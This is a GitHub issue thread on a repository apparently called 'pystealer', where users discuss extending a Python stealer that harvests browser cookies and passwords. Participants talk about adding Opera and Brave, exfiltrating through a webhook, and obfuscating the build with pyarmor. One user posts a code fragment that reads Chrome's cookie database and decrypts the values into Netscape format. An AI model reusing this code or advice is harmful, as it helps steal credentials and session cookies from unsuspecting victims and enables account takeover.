### ISSUE TITLE
How do I add another browser?

### ISSUE THREAD

**Issue by Toxenskiy** [Haste1337/pystealer#1]

**Comment by Haste1337** [comment]
To add a new plugin, in this case a new browser, just add a file to the plugins directory and name it whatever you want, insert the code and you can use chrome.py as a base if you want. Then in the main.py file add it into the config and dump section of code...

**Comment by Toxenskiy** [comment]
what i need to replace in chrome.py to get opera cookies and passwords

**Comment by Haste1337** [comment]
Just copy the paths and other stuff, not exactly sure haven't ever tried. You should do some research. If it's requested enough i'll make a version 2 with more browsers and features.

**Comment by Toxenskiy** [comment]
Google Chrome is different from most other browsers

**Comment by Haste1337** [comment]
Well then, I might make a new version, but for now your going to have to figure it our. However I know the most similair browser to chrome is Brave so try that.

**Comment by Toxenskiy** [comment]
You can use the source
https://pastebin.com/g6BRN5wm

**Comment by Haste1337** [comment]
Ok

**Comment by Toxenskiy** [comment]
pyarmor pack -e "--onefile --hidden-import=pkg_resources.py2_warn" main.py
![Скриншот 04-04-2021 204856](https://user-images.githubusercontent.com/55586522/113517279-994cc180-9587-11eb-874e-53759b6df3be.jpg)

**Comment by Haste1337** [comment]
I think you forgot to install all the dependencies

**Comment by Toxenskiy** [comment]
all

**Comment by Haste1337** [comment]
Oh you did't import win32crypt correctly

**Comment by Toxenskiy** [comment]
this is your file I have not changed anything except the webhook

**Comment by Haste1337** [comment]
Make sure you download windows build tools

**Comment by Toxenskiy** [comment]
What version of Python do you have

**Comment by Haste1337** [comment]
3.6.8

**Comment by Toxenskiy** [comment]
I advise you to transfer cookies to netscape

**Comment by Toxenskiy** [comment]
![image](https://user-images.githubusercontent.com/55586522/113518644-43c8e280-9590-11eb-8465-9f99c8134d7a.png)

**Comment by Toxenskiy** [comment]
cursor.execute("SELECT host_key, path, is_secure, expires_utc, name, encrypted_value from cookies")
            print('F')
            for item in cursor.fetchall():
                if item[0] != "":
                    if int(item[2]) == 1: i = 'TRUE'
                    else: i = 'FALSE'
                    self.stored += f"{item[0]} TRUE {item[1]} {i} {item[3]} {item[4]} {self.decrypt_pass(item[5])}\n"

**Comment by Toxenskiy** [comment]
print ('F') remove only I used it for tests

**Comment by Haste1337** [comment]
ah

**Comment by Haste1337** [comment]
Would you like to be added a contributor to the project?

**Comment by Toxenskiy** [comment]
not really, I was very pleased to get the experience of using python for sqlite tables

**Comment by Toxenskiy** [comment]
does not decode large values
![image](https://user-images.githubusercontent.com/55586522/113562022-1a4e9c00-960e-11eb-84ce-a103824e34f0.png)

**Comment by Toxenskiy** [comment]
why do we return full path
![image](https://user-images.githubusercontent.com/55586522/113591192-44b74e00-963c-11eb-925c-e7b1f6e14fab.png)
